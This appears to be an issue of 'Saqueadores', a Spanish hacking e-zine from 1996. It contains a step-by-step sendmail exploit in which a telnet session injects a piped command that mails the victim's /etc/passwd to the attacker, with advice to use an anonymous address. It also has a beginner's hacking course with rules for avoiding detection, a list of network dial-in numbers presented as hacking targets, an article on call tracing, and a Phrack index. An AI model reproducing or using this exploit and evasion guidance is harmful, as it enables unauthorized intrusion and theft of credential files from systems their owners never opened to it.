Copy Link
Add to Bookmark
Report
SET 005
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º SAQUEADORES N§5 20-12-96 º
º Segunda Epoca º
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
º Fanzine del underground informatico º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÑÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º Division tecnica ³ Eljaker, Warezzman, El Duke de Sicilia, º
º ³ +Ochodedos... º
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
º Colaboradores ³ SLinK, RoN, RedCool, Valfadir... º
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
º Division comercial ³ Ericx, Warezzman, Red... º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÏÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º Disponible en º http://www.geocities.com/SiliconValley/park/7574/ º
º º http://iberhack.ml.org º
º º http://www.geocities.com/SiliconValley/Park/7479/ º
ÌÍÍÍÍÍÍÍÍÍÍÑÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÑÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º E-mail ³ eljaker@hotmail.com º Irc ³ #hack, #iberhack, etc... º
º ³ el_duke1@hotmail.com º ³ En la red hispana de irc º
º ³ warezzman@geocities.com º ³ º
ÈÍÍÍÍÍÍÍÍÍÍÏÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÏÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
"If you give a man a crack he'll be hungry again
tomorrow, but if you teach him how to crack, he'll
never be hungry again"
+ORC
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 01. CONTENIDOS º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
N§__Titulo/Autor___________________________________Tema_________Nivel tecnico_
01. Contenidos Saqueadores numero 5
02. Presentacion Saqueadores numero 5
03. El bug del mes / por Red Hackin Medio-alto
04. Curso de hacking empezando desde cero I Hackin Bajo
por Eljaker
05. Traceo de llamadas en infovia por el Duke Telefonia Medio-alto
06. Telefonos de algunas redes con numero en Hackin
Espa¤a
07. Indice de la revista Phrack. #40-49 Publicaciones en ingles
por el Duke
08. Hackers, phreackers y piratas Opinion
09. Avisos, peticiones, etc... Variado
10. ¨Ser o no ser un hacker? Opinion
11. Despedida Taluego Lucas
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 02. PRESENTACION º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Hola amigos soy el Duke de Sicilia. Eljaker esta un poco liado ultimamente,
por eso me han encargado que cordine temporalmente el fanzine. Ademas de este
han ocurrido otros cambios.
Como habreis notado, el look de la revista ha cambiado bastante. Tenemos
nuevos colaboradores y articulistas.
Hemos decidido que la revista tendra un caracter democratico, por lo tanto
la figura de editor-jefe desaparece, ahora somos un equipo donde nadie
manda.
Vamos a incluir articulos ideologicos y de opinion. (No os preocuipeis, no
pretendemos transformar el fanzine en un folletin politico) Aunque los hackers
y crackers pertenezcamos al undergroung, no podemos olvidarnos de lo que
pasa hay fuera, el mundo cambia muy deprisa y debemos estar preparados
para los cambios, y si es necesario, nosotros mismos nos veremos obligados
ha hacer esos cambios.
Hay otros cambios menos obvios, de los que ya os ireis dando cuenta poco
a poco.
el duke de sicilia
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 03. EL BUG DEL MES º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Hola soy el Red Cracker y me han encargado que escriba esta nueva seccion de
la revista. (Solo en este numero) La verdad es que mi especialidad no es el
hacking por eso el bug del que voy a hablar no es muy espectacular. Ademas es
un poco antiguo con lo que seguramente no funcionara en la mayoria de las
maquinas.
Lo que hace este bug, es permitir que enviando un comando en la linea
del sendmail puedas conseguir que el fichero de passwords sea enviado
a tu direccion de correo. (Por eso es conveniente usar una direccion
anonima para no ser pillado)
------------------------------------------------------------------------------
Sistemas: Unix's en general, espacialmente AIX y SUNOS
Versiones: Sendmail, versiones anteriores a la 5.57
Descripcion: Bug del sendmail
Ejemplo: en unix o linux
saqland % telnet victima.com 25
Trying 128.128.128.1...
Connected to victima.com
Escape character is '^]'.
220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"
250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok
rcpt to: loquequieras
550 loquequieras... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
saqland %
Ejemplo: Conexion desde DOS o Windows y otros
Con un programa de telnet conecta a este url -> victima.com:25
o si se puede configurar en los menus configuralo para que la
conexion se haga al puerto 25, que es el del sendmail.
220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"
250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok
rcpt to: loquequieras
550 loquequieras... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Notas:
-victima.com = nombre del ordenador a hackear
-saqland = nombre de nuestro ordenador
-Lo que aparece con un numero delante son mensajes de nuestra victima,
el resto es lo que tienes que escribir.
-Aprende a usar bien el programa de telnet, porque es el que mas usaras a la
hora de hackear.
------------------------------------------------------------------------------
Red
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 04. CURSO DE HACKING EMPEZANDO DESDE CERO I º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Hola amigos, bienvenidos al maravilloso mundo del hacking. Como estas leyendo
esto supongo que tendras muy pocos conocimientos sobre hacking, por eso
voy a intentar escribir de la forma mas clara que pueda, aun asi, si os
perdeis no teneis mas que mandarme un mensaje y me correjire. Los que
esten leyendo esto tambien, pero tengan un poco mas de nivel, pueden
seguir leyendo, nunca viene mal repasar los conocimientos basicos.
Conceptos basicos:
------------------
Como cualquier aburrido manual de iniciacion que se precie, ahora vienen
las definiciones basicas que todo hacker debe saber. Estas definicones,
no vienen en ningun diccionario y son muy subjetivas y cambientes,
cada uno las interpreta a su manera y su significado varia con el tiempo
o segun el contexto. Voy a intentar dar la definicon mas extendida, e
intentare explicar todos los posibles significados y variantes:
HACKING >> Penetrar en sistemas informaticos ajenos sin su consentimiento,
tanto "virtualmente" como fisicamente. (Ej. Entrar en una oficina y robar
unos manuales)
>> Cualquier accion encaminada a conseguir lo primero; como son
la ingenieria social, el trashing, etc...
HACKER >> Persona que hace hacking.
>> Persona muy habil con los ordenadores.
>> Pirata informatico, en cualquiera de sus muchos significados.
PIRATA INFORMATICO >> Persona dedicada a la copia y distribucion de
software ilegal, tando software comercial crackeado, como shareware
registrado, etc...
>> Persona que elimina las protecciones software. Mas conocido como
cracker.
>> Delincuente informatico.
CRACKER >> Persona que elimina las protecciones logicas y a veces
fisicas del software.
>> Hacker malvado.
>> Hacker que emplea la fuerza bruta, o metodos que da¤an el sistema
que intenta hackear.
CRACKEADOR >> Programa utilizado para sacar los password encriptados
de los archivos de passwords. Bien desencriptandolos, cuando se puede,
o bien provando multiples convinaciones hasta que encuentra la
correcta.
INGENIERIA SOCIAL >> Convencer a alguien, por diversos medios, para que
nos facilite informacion util para hackear, o para que haga algo que
nos beneficie. (No solo al hackear)
TRASHING >> (Recogida de basura) Rebuscar en la basura, para encontrar algo
que pueda ser util a la hora de hackear.
HACKEAR POR FUERZA BRUTA >> No significa nada bestia, ni que necesite mucha
fuerza, simplemente es un hacking que necesita mucho esfuerzo,
mucho tiempo de proceso o de intentos. Como es probar distintos passwords
hasta encontrar el acertado, usar un crackeador, desencriptar
un fichero encriptado, sacar las claves de un archivo de passwords
usando las palabras de un diccionario, etc..
FICHERO DE PASSWORD >> Fichero en el que el sistema guarda sus claves de
acceso.
CARDING >> Uso ilegitimo de las tarjetas de credito, o sus numeros,
pertenecienes a otras personas. Se relaciona mucho con el hacking,
porque para conseguir numeros de tarjetas de creditos, una de las
mejores maneras es el hacking.
PHREAKING >> Uso del telefono, o de las redes y servicios telefonicos,
gratis o con un coste menor del normal. Devido al uso intensivo del
telefono por parte de los hackers, es bastante normal que usen el
phreackin para ahorrarse unas pelas.
>> Modificacion o intervencion de las lineas telefonicas, con otros
fines distintos del llamar gratis.
BOXING >> Uso de aparatos electronicos o electricos (Boxes) para
hacer phreacking.
CABALLOS DE TROYA >> Programa que se queda residente en el sistema
que pretendemos hackear y que nos facilita informacion sobre lo que
pasa en el.
>> Un tipo de virus o programa que usa otros programas para introducirse
en sistemas ajenos. (Que me perdonen por la definicon tan cutre, los
expertos en virus)
PINCHADO DE LINEAS / SNIFFING >> Espiar y obtener la informacion que
cicula por una red.
SNIFFER >> Programa encargado de intercepatar la informacion que circula
por la red.
TRACEAR >> Seguir la pista a traves de la red a una informacion o a una
persona.
BUG, AGUJERO, HOLE >> Defecto del software que permite a los hackers
introducirse en ordenadores ajenos.
EXPLOIT >> Metodo concreto de usar un bug para entrar en un sistema.
WAR DIALER, DISCADOR >> Programa que escanea la linea telefonica en
busca de modems.
PPP, TCP/IP, UDP >> Distintos protocolos de comunicacion, que usan las
grandes redes como internet.
SUNOS, AIX, HP/UX, IRIX, VMS, UNIX >> Varios sistemas operativos que usan
los grandes ordenadores.
ADMINISTRADOR, SYSOP, ROOT >> Persona que se encarga del mantenimiento
de un sistema informatico, generalmente tienen control total sobre el
sistema.
BACKDOOR >> Puerta trasera, mecanismo en el software que permite entrar
evitando el metodo normal.
CORTAFUEGO, FIREWALL, BASTION >> Sistema avanzado de seguridad que
impide a personas no acreditadas el acceso al sistema.
LOGIN--> Procedimiento de entrar en un sistema.
Normas basicas del hacker:
--------------------------
Para terminar este primer capitulo voy a dar, tambien algo aburrido
y muy repetido por todos los manuales de iniciacion, pero es que es
algo imprescindible. Codigo etico y de comportamiento del hacker.
1. Nunca da¤es algo intencionadamente. Lo unico que conseguiras sera
buscarte problemas.
2. Modifica solo lo estrictamente necesario para entrar y para evitar
ser localizado, o para poder acceder otras veces.
3. No hackees nunca por venganza ni por intereses personales o economicos.
4. No hackees sistemas pobres que no puedan reponerse de un ataque
fuerte. Ni tampoco sistemas muy ricos o grandes que puedan permitirse
gastar dinero y tiempo en buscarte.
5. Odia a telefonica pero no te metas con ella.
6. No hackees ordenadores del gobierno. (El gran hermano te observa) Tal vez
sean mas emocionantes, pero no olvides que la policia trabaja para ellos.
7. No comentes con nadie, a menos que sea de total confianza, tus
aza¤as. (Los mas grandes hackers de la historia han sido cazados
debido a las confesiones de sus novias)
8. Cuando hables en bbs o por internet, procura ser lo mas discreto
posible. Todo lo que digas quedara almacenado.
9. Se paranocio. Una da las caracteristicas principales de los mejores
hackers es la paranoia.
10. No dejes ningun dato que pueda relacionarse contigo, en los ordenadores
que hackees. Y si es posible, ni siquiera "firmes".
11. Estudia mucho antes de lanzarte a la practica. En el proximo numero
de esta serie hablare de los lugares mas seguros para empezar, pero mientras
tanto, ten en cuenta que eres un total novato, si te encuentras con
problemas probablemente, tu aventura acabe antes de empezar.
12. Nunca dejes de estudiar y de aprender nuevas cosas, el mundo de
la informatica avanza rapidamente, y es necesario mantener un buen
ritmo si no quieres quedarte atras.
Algunos de estos consejos te pareceran anticuados y estupuidos, pero la
mayoria tienen un doble objetivo. Mantener limpio el maltratado nombre
de los hackers y evitarte problemas con la justicia.
eljaker
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 05. TRACEO DE LLAMADAS EN INFOVIA º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Los rumores se han confirmado, nos temiamos algo asi de telefonica, pero
la realidad supera la ficcion. Con un endiablado sistema, el gran hermano
nos tiene cogido por los mismisimos.
Ya lo avisabamos en el numero anterior, conociendo nuestra ip* en internet
cualquiera puede averiguar el telefono desde donde llamamos. Se acabo el
anonimato en internet y peor aun, se acabo el hacking seguro en internet.
El proceso es el siguiente, cualquiera con el que te conectes en internet
sabra tu direccion ip, con esta direccion se dirige a tu proveedor. En
teoria los datos que tiene el proveedor sobre ti son anonimos, pero hay
muchas maneras de conseguirlos. Una vez encontrado tu servidor, averiguan
que cuenta es la que estas usando, y ya te han pillado.
Muchos pensaran, "pues yo uso una cuenta hackeada y nunca me pillarian".
Grave error. Aqui es donde esta la verdadera putada de telefonica.
Segun hemos averiguado por fuentes fiables, al conectar con tu
servidor por infovia, a tu proveedor no solo le llegan tu login y
tu password, sino que tambien se envia tu caller-id*, conociendo tu
caller-id conocen el numero del telefono desde el que llamas y entonces te
localizan sin remedio.
Ademas de este control, telefonica ha colocado aun mas paranoicos,
controles de seguridad en infovia, como contabilizacion de las veces
que llamas en un dia, impiden el acceso libre entre servidores en
infovia obligando a pasar por sus menus, etc...
La mayoria creen en el anonimato en internet, pero esto es una burda
mentira, el anonimato no existe, porque el gran hermano te esta observnado.
NOTAS TECNICAS:
---------------
*IP-->Es tu direccion en una red tcp-ip*, y es necesaria para el
intercambio de datos.
*TCP-IP-->La red internet funciona bajo el protocolo de comunicacion
tcp-ip, este protocolo se basa en envios de paquetes de datos, desde el
servidor hasta el cliente. Devido a esta estructura, con cualquier
ordenador que te conectes, intercambiaras paquetes, y para que esos
paquetes puedan llegar a su destino, ambos deben conocer la ip, del
otro, con lo cual es muy dificil quedar en anonimato, a menos que uses
un tipo de ip-spoofing*.
*IP-SPOOFING-->Es una tecnica, por la cual, el ordenador con el que estas
conectado no conoce tu verdadera ip, sino que recibe otra. Se ha mitificado
mucho, y en realidad tampoco es nada raro. (Aunque si es dificil hacerlo)
Por ejemplo, usar un proxy, es un tipo de ip-spoofing, ya que los ordenadores
con los que conectes a traves del proxy, recibiran la ip, de este y no la
tuya.
*CALLER-ID-->Es la informacion sobre tu llamada, que recibe la persona
a la que estas llamando. Contiene la informacion de tu area (la centrlaita*
que te corresponde) y el numero de telefono desde donde llamas. Si el
telefono al que llamas esta preparado para detectar tu caller-id, ese
numero aparecera en su display incluso antes de descolgar. (Los que
tengan un modelo moderno de telefono movil, sabran de que hablo)
Con lo cual se acabo tu anonimato. Parece ser que los ordenadores de
infovia, estan preparados para pasar esta informacion, automaticamnte
a tu servidor. Esto en teoria sirve para evitar las estafas a los proveedores
y que mas de una persona use la misma cuenta, pero esto es una excusa.
Varios de nosotros hemos comprobado que en la mayoria de los servidores
(arrakis, ctv, etc...) es posible que varias personas a la vez puedan
usar la misma cuenta, sin preocuparse. En realidad este sistema es otra
de las estrategias de telefonica para coartar nuestra libertad y nuestro
anonimato.
*CENTRALITA--> Mas o menos cuando haces una llamada pasa esto:
1. Descuelgas y marcas un numero.
2. Tu centralita, recibe este numero y dependiendo de varias cosas, como
son el prefijo que hayas marcado, el tipo de llamada*, el tipo de
centralita*, etc... establecera una conexion u otra. En este ejemplo, vamos a
suponer que la centralita conecta directamnete con la centralita de la
persona a la que llamas y le envia el numero de la persona y tu caller-id.
3. Esta segunda centralita manda las se¤ales de llamada a su telefono, y
tu caller-id. (Inlcuso antes de descolgar el telefono saben quien llama)
4. La persona descuelga el telefono y la conexion se establece.
*TIPO DE LLAMADA--> Si la llamada es interproviancial o internacional, tu
llamada pasara por una o varias centralitas intermedias mas, y si tu
centralita coincide con la del llamado no es necesario pasar por
otra centalita. (Esto se nota mucho, porque la llamada es muy rapida
y porque el volumen se oye mas alto que el normal)
*TIPOS DE CENTRALITAS--> Hay varios modelos de centralitas, pero para
simplificar vamos a agruparlos en dos tipos:
a) Las centralitas analogicas, estas son las mas antiguas y progresivamente
las van cambiando por las nuevas. Estas centralitas se reconocen, porque
la marcacion es por pulsos (La que usaban los telefonos antiguos en los
que habia que girar con el dedo una rueda numerada, y cada numero suena
como un tictictictic)
Aunque hay algunas centralitas analogicas que tambien aceptan marcacion
por tonos. Debido a la antigua tecnologia de estas centralitas, la
informacion sobre el caller-id, no se envia, aun asi, es relativamnte
facil tracear la llamada.
b) Centralitas digitales, estas son mas nuevas, y se reconocen porque
la maracion se realiza por tonos. (La tipica marcacion, en la que a cada
numero le corresponde un solo bip) Estas centralitas son de tecnologia mas
moderna y ademas de enviar tu caller-id, tambien hacen un completo
registro de tu llamada, con lo cual, aunque la persona no disponga de
display para ver el caller-id, puede llegar a ti sin muchos problemas.
Permiten todos los servios nuevos que ha creado telefonica, como
el devios de llamadas, la llamada a tres, la llamada anonima*, etc...
*LLAMADA ANONIMA--> Uno de los nuevos servicios de telefonica, es la
posibilidad de evitar que tu caller-id sea enviado, mediante la marcacion
de un codigo especial antes de llamar. Este codigo esta siendo investigado
por nuestro equipo y posiblemente sea el sujeto de uno de nuestros nuevos
expedientes secretos. Aun asi, el telefono al que llameis puede que
no acepte llamadas anonimas, con lo que el truco no servira.
La conclusion es que hay que andarse con mucho cuidado de ahora en adelante,
con lo que se hace en internet. Como decia un famoso hacker:
"Solo los hackers paronicos consiguen continuar cuando han cumplido mas de
21 a¤os"
el duke de sicilia
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 06. TELEFONOS DE ALGUNAS REDES CON NUMERO EN ESPA¥A º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Los lugares calsicos de hackeo son las grandes redes, por eso he recopilado
en este articulo, los numeros de las redes mas importantes que ofrecen
sus servicios en nuestro pais. Son pocas comparadas con las que operan en
Estados unidos, pero algo es algo.
Nodo | Ciudad | Terminal | BPS | Numero | Red
-----------------------------------------------------------------
6670 | BARCELONA | E71 | 2400 | (93)4155082 | TYMNET
| BARCELONA | E71 | 9600 | (93)4156518 | TYMNET
6726 | BILBAO | E71 | 2400 | (94)4276492 | TYMNET
06726 | BILBAO | E71 | 9600 | (94)4411500 | TYMNET
13643 | MADRID | E71 | 2400 | (91)3026006 | TYMNET
| MADRID | E71 | 9600 | (91)3830918 | TYMNET
04535 | MADRID | E71 | 9600 | (91)7661144 | TYMNET
| TODAS | E71 | 9600 | 047 | IBERPAC
| TODAS | E71 | 9600 | 048 | IBERPAC
| TODAS | E71 | 14400 | 041 | IBERPAC
| TODAS | E71 | 14400 | 042 | IBERPAC
| BILBAO | E71 | 1200 | (94)4419262 | IBERPAC
| MADRID | E71 | 1200 | (91)4582241 | IBERPAC
| TODAS | E71 | 2400 | 090 | DATAPAC
| MADRID | E71 | 2400 | (91)3591951 | COMPUSERVE
| BARCELONA | E71 | 2400 | (93)4123282 | COMPUSERVE
| BILBAO | 8N1 VT100 | 1200 | (94)4209444 | SPRITEL
| BILBAO | 8N1 VT100 | 1200 | (94)5134048 | SPRITEL
| BILBAO | 8N1 VT100 | 1200 | (94)3470044 | SPRITEL
| TODAS | PPP | 28800 | 050 | INFOVIA
| TODAS | CEPT-1 | 9600 | 030 | IBERTEX
| TODAS | CEPT-1 | 2400 | 031 | IBERTEX
| TODAS | CEPT-1 | 2400 | 032 | IBERTEX
| TODAS | CEPT-1 | 2400 | 033 | IBERTEX
| TODAS | CEPT-1 | 2400 | 034 | IBERTEX
| TODAS | CEPT-1 | 2400 | 035 | IBERTEX
| TODAS | CEPT-1 | 2400 | 036 | IBERTEX
Observaciones:
-A ver quien consigue conectar decentemente con el 090, lo hemos
intentado de infinidad de maneras y nada. :-?
-Aunque algunas redes parezcan muy poco propicias para el hacking,
esto solo es una apariencia.
#Por ejemplo ibertex es un sitio ideal (Aunque caro) de empezar
a hackear. Tiene un sistema de seguridad muy escaso y antiguo,
cualquier hacker que se precie puede conseguir algo.
#Infovia, al ser un sistema nuevo, tambien es facil de hackear, ya
que tiene muchos agujeros inexplorados. Aunque andaros con cuidado,
que jugar con la telefonica es peligroso. (El gran hermano te observa)
-Algunos datos estan ya anticuados, y otros no han sido comprobados,
por favor que alguien compruebe los datos y nos envie los resulatados
actualizados. Esto de vivir lejos de las grandes ciudades es un poco
molesto a la hora de divertirse. :-)
AVISO: La mayoria de estas redes tienen fuertes medidas de seguridad,
a si que llevaros cuidado. Aunque su hackeo este muy bien documentado
como en el caso de la red datapac o la red tymnet, estos numeros
de telefono tienen activado la deteccion del caller-id, esto quiere decir
que nada mas llamar saben el numero del telefono desde el que estais
llamando. A menos que useis un telefono realmente limpio, os aconsejaria que
os andaseis con cuidado.
PETICION: Si alguien conoce el numero de telefono de otras redes, que por
favor, nos los envie, para que podamos publicarlo en un proximo numero.
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 07. Indice de la revista Phrack. Numeros 40 al 49 º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Aunque nuestra publicacion es en espa¤ol, no podemos olvidar a Phrack la
revista electronica sobre hacking en ingles mas famosa del mundo (Despues
de la nuestra :-) y la que muchos piensan
que es la mejor. Por eso hemos decidido hacer un indice de los numeros mas
actuales, los ultimos 9 numeros aparecidos de esta revista.
Datos sobre la revista:
-----------------------
Phrack Magazine
603 W. 13th #1A-278 (Direccion de correo)
Austin, TX 78701
ftp.fc.net (FTP)
/pub/phrack
http://www.fc.net/phrack (WWW)
phrack@well.com (Direccion e-mail)
Indice:
-------
* Los articulos con un asterisco son de recomendada lectura. (Cortesia
de el duke)
-= Phrack 40 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by Dispater 06K
2. Phrack Loopback by Dispater and Mind Mage 50K
3. Phrack Pro-Phile on Lex Luthor by Taran King 36K
4. Network Miscellany by The Racketeer [HFC] 32K
5. Pirates Cove by Rambone 57K
6 Cellular Telephony, Part II by Brian Oblivion * 72K
7. The Fine Art of Telephony by Crimson Flash * 65K
8. BT Tymnet, Part 1 of 3 by Toucan Jones 57K
9. BT Tymnet, Part 2 of 3 by Toucan Jones 55K
10. BT Tymnet, Part 3 of 3 by Toucan Jones 91K
11. SummerCon 1992 by Knight Lightning and Dispater 35K
12. PWN/Part 1 by Datastream Cowboy 50K
13. PWN/Part 2 by Datastream Cowboy 48K
14. PWN/Part 3 by Datastream Cowboy 48K
Total: 702K
-= Phrack 41 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by Dispater 07K
2. Phrack Loopback by Dispater and Mind Mage 52K
3. Phrack Pro-Phile on Supernigger 10K
4. Network Miscellany by The Racketeer [HFC] 35K
5. Pirates Cove by Rambone 32K
6 Hacking AT&T System 75 by Scott Simpson 20K
7. How To Build a DMS-10 Switch by The Cavalier 23K
8. TTY Spoofing by VaxBuster * 20K
9. Security Shortcomings of AppleShare Networks by Bobby Zero 16K
10. Mall Cop Frequencies by Caligula XXI 11K
11. PWN/Part 1 by Datastream Cowboy 46K
12. PWN/Part 2 by Datastream Cowboy 49K
13. PWN/Part 3 by Datastream Cowboy 43K
Total: 364K
-= Phrack 42 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by The Editor 14K
2. Phrack Loopback / Editorial Page / Line Noise 48K
3. Phrack Pro-Phile on Lord Digital 22K
4. Packet Switched Network Security by Chris Goggans 22K
5 Tymnet Diagnostic Tools by Professor Falken 35K
6. A User's Guide to XRAY by NOD 11K
7. Useful Commands for the TP3010 Debug Port by G. Tenet 28K
8. Sprintnet Directory Part I by Skylar 49K
9. Sprintnet Directory Part II by Skylar 45K
10. Sprintnet Directory Part III by Skylar 46K
11. Guide to Encryption by The Racketeer [HFC] 32K
12. The Freedom Of Information Act and You by Vince Niel 42K
13. HoHoCon from Various Sources 51K
14. PWN by Datastream Cowboy 29K
Total: 474K
-= Phrack 43 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by The Editor 24K
2. Phrack Loopback Part I 38K
3. Phrack Loopback Part II / Editorial 44K
4. Line Noise Part I 39K
5. Line Noise Part II 43K
6. Phrack Pro-Phile on Doctor Who 15K
7. Conference News Part I by Various Sources 53K
8. Conference News Part II by Various Sources 58K
9. How To Hack Blackjack (Part I) by Lex Luthor 52K
10. How To Hack Blackjack (Part II) by Lex Luthor 50K
11. Help for Verifying Novell Security by Phrack Staff * 48K
12. My Bust (Part I) by Robert Clark * 56K
13. My Bust (Part II) by Robert Clark * 55K
14. Playing Hide and Seek, Unix Style by Phrack Accident 31K
15. Physical Access and Theft of PBX Systems by Co/Dec 28K
16. Guide to the 5ESS by Firm G.R.A.S.P. * 63K
17. Cellular Info by Madjus (N.O.D.) * 47K
18. LODCOM BBS Archive Information 24K
19. LODCOM Sample Messages 52K
20. Step By Step Guide To Stealing a Camaro by Spy Ace 21K
21. Acronyms Part I by Firm G.R.A.S.P. 50K
22. Acronyms Part II by Firm G.R.A.S.P. 51K
